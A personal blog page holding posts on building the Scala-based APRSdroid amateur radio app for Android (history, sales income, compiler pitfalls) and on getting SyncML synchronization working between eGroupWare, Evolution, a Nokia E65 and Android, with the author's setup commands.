If you have an Android app with a significant user base that has a better cipher list, let me know and I will add it to the list.

Posted 2013-10-14 19:06:48 Tags:


APRSdroid is an Amateur Radio geo-location (APRS) app for Android licensed under the GPL. It started as a Scala learning experience two years ago and has since become a nice source of auxiliary income, despite being Open Source and offering free downloads from the homepage. However, using Scala was not always the easiest path to take.

Project history

In mid-December 2009, a HAM radio friend asked me: "It can't be too hard to make an Android APRS app, can it?" and because there was none yet, I started pondering. On December 31st, instead of having fun and alcohol, I made the first commit. On January 1st, at 03:37 local time, the first placeholder release 0.2 was created.

Over the course of the next weeks I discovered step by step what I had gotten myself into. APRS is a protocol with a long history of organic growth, firmware limitation workarounds, many different ways to say the same thing (at least four just for position reports), countless protocol amendments and, to add insult to injury, base-91 ASCII encoding.

There was no Java code available to abstract away the protocol and to allow me to keep my sanity. So I read the spec, implemented position encoding, re-read the spec, implemented HTTP and UDP sending code, read the amendments, re-re-re-read the spec, etc.

The first usable release became 0.4 at the end of January. Because APRSdroid has always been a leisure-time project, phases of activity alternated with idle phases, and the app slowly grew features through 2010.

In early 2011, one year into it, I decided it was high time to make the project pay for itself. Real APRS gear (radio transceivers with GPS and packet radio support) was expensive (on the order of US$500), and the app was not only easier to use but also grew more and more features (except for direct access to the amateur radio spectrum, which does not work well on cell phones).

For some time, I went underground (by omitting git push to github and only providing nightly builds to some friends) and worked on the code behind closed doors (there were no other people contributing source anyway).

On April 1st, I decided to fool the community a little, but was not taken too seriously. In the meantime I was polishing a 1.0 release for Android Market.

Income Report

On April 18th, 2011, APRSdroid 1.0 was "commercially" launched to Android Market. It was important for me to keep up the OSS spirit, so I kept providing source code and APK files from the home page. By buying the app instead of just downloading it, the users got automatic updates and a good feeling of supporting what they liked. Also, I did not make it too obvious in the Market description that the app can be downloaded for free as well ;-)

So far, this scheme has paid off very well. Since the beginning, more than 60% of all app users actually bought it (it is possible to monitor the global user activity on the APRS network), with an average of 350 sales per month, at 2.99€ / 4.49US$ (minus the Google "tax" and subject to local income taxes).

Most users I had contact with were ready to pay for the app even though they knew they could download it for free. Only one person so far demanded the free version to be made available on Android Market (using CAPS and three consecutive Twitter messages, though, so I did not feel too pressed).

So far, I invested the income into real APRS hardware, a Desire Z (or G2 or HTC Vision) and am eagerly awaiting the availability of ICS tablets, aiming at finally adding Fragments support to the app.

Scala + Android = Pitfalls

I decided to use Scala because I do my coding in vim and Java is so crammed up with boilerplate code that you can not sensibly use it with anything but a bloated refactoring IDE. Another reason was that I do not like to repeat myself, and Java provides even less usable abstractions than the good old C language with its #define.

Scala was the language of the day, and I liked what I had read about it so far. It sounded good enough for an experiment anyway. Fortunately, people had already figured out how to make it work on Android without carrying the bloat of the full Scala runtime, so all I had to do was some refinement of build.xml.

The first warning sign was that I had to override def $tag() to work around an issue in the 2.7 beta compiler (IIRC). I complied by cargo-cult-copying the code from some place and moved on.
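
For the record, the workaround looked roughly like this (a reconstruction from memory, not the literal code I copied):

import android.app.Activity

// Scala 2.7 beta on Android: every class had to provide $tag() itself,
// because the compiler failed to generate it properly
class HelloActivity extends Activity {
  override def $tag(): Int = 0
}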

Another major issue was Android's AsyncTask. The API requires the developer to override protected SomeType doInBackground(OtherType... params). Unfortunately, Scala had trouble overriding abstract varargs methods from Java, and thus the app crashed with the opaque java.lang.AbstractMethodError: abstract method not implemented exception. After triangulating the source of the problem (who would have suspected a compiler bug?), I wrote a wrapper class in Java. Another bunch of days well spent.
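
For illustration (a sketch, not the actual APRSdroid code): the Scala override below compiles just fine, but with the affected compiler versions the generated class lacks the varargs bridge method that the framework calls, so it dies at runtime. The fix is a small Java shim that implements doInBackground() once and forwards to a plain abstract method, which Scala can override without trouble.

import android.os.AsyncTask

// compiles, but crashes with AbstractMethodError when Android invokes
// the missing doInBackground(String[]) varargs bridge at runtime
class UploadTask extends AsyncTask[String, Void, String] {
  override def doInBackground(params: String*): String =
    params.mkString("\n") // pretend to send the packets here

  override def onPostExecute(result: String) {
    // update the UI with the result
  }
}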

One of my biggest hopes for Scala was to be able to reduce the boilerplate around Android's numerous single-abstract-method (SAM) callback parameters. Unfortunately, this problem is not yet solved in Scala, requiring you to write an explicit implicit conversion function for each SAM type.
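
Such a conversion looks like this (a sketch with made-up names, not APRSdroid's actual helper):

import android.view.View

// one hand-written implicit conversion per SAM interface, wrapping a
// Scala closure into Android's View.OnClickListener
object Listeners {
  implicit def fnToClickListener(f: View => Unit): View.OnClickListener =
    new View.OnClickListener() {
      def onClick(v: View) { f(v) }
    }
}

// usage, after "import Listeners._":
//   startButton.setOnClickListener((v: View) => startTracking())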

However, not everything was bad in Scala-land. Scala's traits allowed me to reuse the same code in descendants of Android's Activity, ListActivity and MapActivity (see the sketch below). Working string comparisons, type-based match and a huge amount of syntactic sugar, added on top of a proper ctags config, actually made life good.
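
A minimal sketch of the trait trick (names invented for illustration):

import android.app.{Activity, ListActivity}
import android.widget.Toast

// a trait extending Activity can be mixed into any Activity subclass,
// so helpers are written once and reused across all the UI flavours
trait UIHelper extends Activity {
  def toast(msg: String) {
    Toast.makeText(this, msg, Toast.LENGTH_SHORT).show()
  }
}

class HubActivity extends Activity with UIHelper
class LogActivity extends ListActivity with UIHelper
// MapActivity works the same way, given the Google Maps add-on jar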

Further, the base-91 decoding was elegantly implemented as a map/reduce operation on the ASCII string. Other interesting solutions were a UrlOpener for buttons and regex-based packet matching (warning: please do not try to understand the regexes!).
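
The decoding part boils down to a single fold over the character values (a sketch of the idea, not the literal APRSdroid code): each character contributes its ASCII value minus 33 as one base-91 digit.

// base-91 decoding as a fold ("reduce") over the string, assuming the
// APRS convention that '!' (ASCII 33) represents the zero digit
def decodeBase91(s: String): Long =
  s.foldLeft(0L) { (acc, c) => acc * 91L + (c - 33) }

// e.g. decodeBase91("<*e7") yields 20427156, which matches the scaled
// longitude offset in the spec's compressed position report example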

What remains in the end is the build time (compilation + ProGuard), which is subjectively higher for the Scala app than for a Java-only project of comparable size. However, that might be due to a bug in my build.xml, and so far I have not been impatient enough to investigate.


After two years, I am really glad to have gone down this path. Learning Scala was a very pleasant experience, and it improved my ability to see problems from different points of view. However, it also significantly restricted the number of people able to contribute: of over 500 commits to APRSdroid, only three were made by another developer. The APRS parsing code has since been replaced by javAPRSlib, a Java library with major contributions from several other people.

APRSdroid remains my only Scala project. My other Android projects are written in Java, either because I did not want to restrict contributors, or because I did not expect the Java code to become complex enough.

Would I start a new Scala project on Android? Probably not, as it is already hard enough to find people willing to contribute to your pet project when it is written in Java. Scala makes that almost impossible.

Would I contribute to an existing Scala project? Yes!

P.S.: Starting around March 2012, I will be looking for Android/IT-Sec related freelance jobs. Check github and Android Market for my other projects.

Posted 2011-12-29 19:10:55

My love hate aversion to SyncML

Some years ago, I accidentally managed to synchronize my Nokia E65 phone to Evolution using Bluetooth, OpenSync packages from a custom repository, a huge amount of patience and a blood sacrifice to the gods of bloated binary XML protocols.

Unfortunately, soon after that my file system crashed, I reinstalled Debian, and the magic setup was gone forever. Whatever I tried, all I got were opaque error messages. After many months of futile efforts, I finally gave up on transferring events to my phone and phone numbers to my PC. Sigh.

It was only last autumn that I dared to challenge my luck again. After setting up a new colo box (it is serving this blog article right now) and upgrading my Android toy-phone to an Android 2.x firmware, it was time to get my data from the good old Nokia phone to the Android device. Somehow.

The Quest of SyncML, part 1: eGroupWare

I began my quest by simply installing the current version of eGroupWare from the Debian Backports repository. Unfortunately, this version (1.6.002) is flawed with regard to SyncML: it worked partially with my cell phone, and failed miserably with Evolution.

After several days of fruitless efforts, I found a set of SyncML patches for eGroupWare written by Jörg Lehrke, which are already integrated into 1.6.003. Fortunately, he is offering Debian 5.0 packages as well. I just added the following line to my /etc/apt/sources.list and installed the new version:

deb ./

Do not forget to import the repository key as well:

wget -O - | apt-key add -

With the shiny new eGroupWare, I only needed to wipe my previous synchronization attempts and to enable the SyncML application for the Default user group. Et voilà, I could access my new RPC server at https://<servername>/egroupware/rpc.php

Part 2: Evolution

This step works more or less properly; an official HOWTO is available. The only thing I have not automated yet is triggering the synchronization itself. It still requires manually running

syncevolution <servername>
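
(A cron entry along these lines should eventually do the trick; this is only a sketch, as I have not set it up yet. <servername> is the peer configured above.)

0 * * * *    syncevolution <servername>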

Update, 2011-05-15: If you are running Debian, do not use its default packages. After my last dist-upgrade (sid), syncevolution thought it was a good idea to parse its plaintext config files, generate an XML-based config and then throw up on me with strange parser errors.

Uninstalling syncevolution* and using the syncevolution-evolution package from

deb unstable main

solved my troubles, however.

Part 3: Nokia E65

Fortunately, Nokia already includes a SyncML client with their smartphones. It is almost trivial to set up following the official howto. However, only with eGroupWare 1.6.003 could I set the SyncML version to 1.2 and obtain the full contact information.

Fortunately, it was also very easy to add the CAcert root certificate to the Nokia device, allowing my sensitive personal data to travel over an SSL-encrypted connection.

Part 4: Android

Now, the real fun began. Android comes preinstalled with a well-working synchronization service which pushes all your data to Google's servers. Not that I would mind Google having the data; I just wanted to be able to snapshot my contacts and calendar whenever I need to.

There are clients for other synchronization protocols as well: ActiveSync is supported out of the box (and there is the GPL'ed Z-Push ActiveSync server), while Funambol and Synthesis implement SyncML on Android.

Because I already had SyncML running, and Funambol is open source and looked generally promising, I started with it. However, the Android client is "optimized" for interacting with the Funambol server (read: it interoperates with other implementations only by chance).

Besides the hell imposed on the unlucky ones trying to compile android-client themselves instead of using the Market version, there were various compatibility issues. On top of that, SSL verification is only possible with the certificates already stored in the system: neither self-signed nor community-signed SSL connections are possible.

If you have root permissions, there is a workaround to add CAcert (note that keytool needs the BouncyCastle provider jar available on its classpath for the BKS keystore type):

# adb pull /system/etc/security/cacerts.bks .
# keytool -keystore cacerts.bks -storetype BKS -provider org.bouncycastle.jce.provider.BouncyCastleProvider -storepass changeit -import -v -trustcacerts -alias cacert_org_class_3 -file cacert_class3.crt 
Certificate was added to keystore
[Storing cacerts.bks]
# adb remount
remount succeeded
# adb push cacerts.bks /system/etc/security/cacerts.bks

Nevertheless, the experience was so frustrating that I started my own project to improve SSL certificate management on Android.

After many fruitless attempts at getting reproducible synchronization with Funambol's Android client, I decided to test Synthesis. It installed, allowed me to bypass SSL certificate checking (not quite perfect, but at least better than no SSL at all) and synced all my contacts on the first attempt. Wow! Considering the time I had put into Funambol, paying 18€ for a Synthesis license really looks inexpensive in hindsight.

However, not everything is as shiny as it looks at first. It seems Synthesis does not provide its own calendar backend; instead, it uses whatever is available on the device. My device, however, seems to lack any calendar provider unless I install the Funambol client. So, all in all, I am using Synthesis to synchronize events into the Funambol calendar, because Funambol itself fails at it. Funny, isn't it?

Update: After upgrading eGroupWare to 1.8.001, I can actually synchronize my events to my Android using Funambol. Because they change much more often than my contacts, I might actually stick to this software for some more time without buying Synthesis...

Update, 2011-05-15: I finally found the "bug" responsible for my lack of contacts synchronization. I happened to have a contact with an "&" sign in it, which was transmitted verbatim (unescaped) by eGroupWare, freaking out the Funambol parser (SyncML being XML-based, an unescaped "&" is fatal). After renaming the contact, life suddenly became great passable!


SyncML is a friggin' huge pile of shi bloat. Just sync your devices to Google and your experience will be great.

Posted 2011-01-09 22:57:59